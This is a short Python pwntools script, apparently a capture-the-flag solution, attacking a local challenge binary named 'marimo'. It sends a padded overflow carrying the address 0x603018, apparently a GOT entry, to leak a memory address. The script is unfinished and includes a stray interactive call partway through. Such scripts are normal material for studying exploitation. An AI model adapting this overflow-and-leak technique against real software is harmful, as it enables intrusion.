from pwn import *

e = ELF('./marimo')
r = process('./marimo')


#################################
r.sendline('show me the marimo')
r.sendline('a'*0x10)
r.sendline('b'*0x10)
r.sendline('show me the marimo')
r.sendline('a'*0x10)
r.sendline('b'*0x20)
r.sendline('V')
r.interactive()
r.sendline('0')
r.sendline('M')
r.sendline('1'*56+ p64(0x603018))
r.sendline('B')
r.sendline('V')
r.sendline('1')
asd = r.recv(4096).split('\n')[-5]
r.info(asd.split(' : ')[1])
################################

r.interactive()




